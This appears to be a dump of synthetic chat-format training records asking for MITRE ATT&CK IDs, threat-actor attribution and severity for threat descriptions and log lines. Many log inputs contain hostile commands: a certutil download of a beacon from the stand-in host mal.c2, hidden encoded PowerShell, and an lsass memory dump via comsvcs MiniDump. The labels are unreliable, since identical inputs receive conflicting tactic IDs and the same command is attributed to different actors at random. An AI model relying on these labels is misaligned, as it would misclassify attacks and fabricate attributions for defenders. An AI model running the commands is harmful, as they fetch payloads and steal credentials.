messages
listlengths
2
2
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniq...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.120.251.158", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-9NC8D7N2PK)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Defense Evasion", "role": "user" }, { "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.58.185.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1531\"]}", "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: StrongPity has been signed with self-signed certificates.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4G8S9G8SRO)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Discovery", "role": "user" }, { "conten...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.112.45.16", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Search Victim-Owned Websites or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastruc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\": \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.", "role": "user" }, { "content": "{\"tactics\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-WJL6QXPYYR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Credential Access, Defense Evasion", "role": "user" }, { "content": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Crimson can capture webcam video on targeted systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1125\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3711 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.49.165.21", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-2V4XIN0KFS)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3565 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2511 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-20RE8ZQIEK)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3776 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.37.199.34", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"],...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.39.241.78", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0040\"], \"techniques...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.65.134.210", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0006\"], \"tec...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557\", \"T155...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The CozyCar configuration file has been encrypted with RC4 keys.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-R6ZUSO3NKV)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Reconnaissance, Lateral Movement", "role": "user"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-Y6OJVVAQTL)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Collection", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.122.220.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.112.225.111", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA00...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Skidmap has the ability to download, unpack, and decrypt tar.gz files .", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.111.212.93", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-MU7XDQ2CJQ)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Command and Control, Initial Access", "role": "user" }...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.117.38.81", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.168.9.184", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0006\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This targeting of third party organizations to attack further targets is a risky move on the attackers’ part, as it potentially reveals their activity within the compromised third party organizations to the new targe...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-BR1GDGFRGO)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Credential Access", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-PL1PCM54WR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Persistence, Exfiltration", "role": "user" }, { "content": "{\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.149.73.83", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T109...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-7S3CU1N057)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Credential Access, Persistence", "role": "user" }, { "co...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).", "role": "user...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-LFNMZBPDLX)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Initial Access", "role": "user" }, { "cont...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Kobalos can record the IP address of the target machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-S8CUYLTSIQ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", \"bus...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Flame can take regular screenshots when certain applications are open that are sent to the command and control server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T111...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-EXHX108QRW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Impact, Discovery", "role": "user" }, { "content": "{\"severity\": \"E...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoo...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3948 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.181.111.102", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.010\", \"T1564\"]}", "role": "...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor processes and command-line arguments for actions that could create or modify services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: When it first starts, BADNEWS spawns a new thread to log keystrokes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "as...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-CSPT6VBAXP)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.002\", \"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ZxShell has a command to transfer files from a remote host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1717 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.26.18.101", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0002\", \"TA0005\"], \"te...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gelsemium can drop itself in C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2439 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-92VNNOYVIE)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access, Privilege Escalation, Exfiltration", "role": "user" }, ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZeroT has used HTTP for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Emotet has been observed enumerating local processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 902 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1050 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3924 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.107.89.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-Q6ZC3ICFHG)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Impact, Collection", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T108...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.46.213.16", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0011\", \"TA0043\"], \"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-QT7LN2Q84R)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Reconnaissance, Execution", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.21.19.163", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0043\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Avenger can extract backdoor malware from downloaded images.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.003\", \"T1027\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Example commands to find Registry keys related to password information:", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.22.52.121", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0006\", \"TA0040\"], \"te...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.155.26.219", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-GMR1XH2SXX)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Lateral Movement, Persistence", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Next, the script triggered a PowerShell stager", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cardinal RAT can download and execute additional payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-MBPKE8EORV)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"High\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.182.115.100", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"tec...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly executed processes that may abuse Microsoft Outlook forms to obtain persistence on a compromised system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.43.191.6", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0005\", \"TA0010\"], \"techniques\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-4OS3S9WT8X)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.149.184.127", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"t...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-GJQRS2QXZ4)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Persistence", "role": "user" }, { "content":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.121.62.132", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA004...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to PanelURL API or ProxyURL.As mentioned above, in the comments of the main loop section, it also comes with several...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...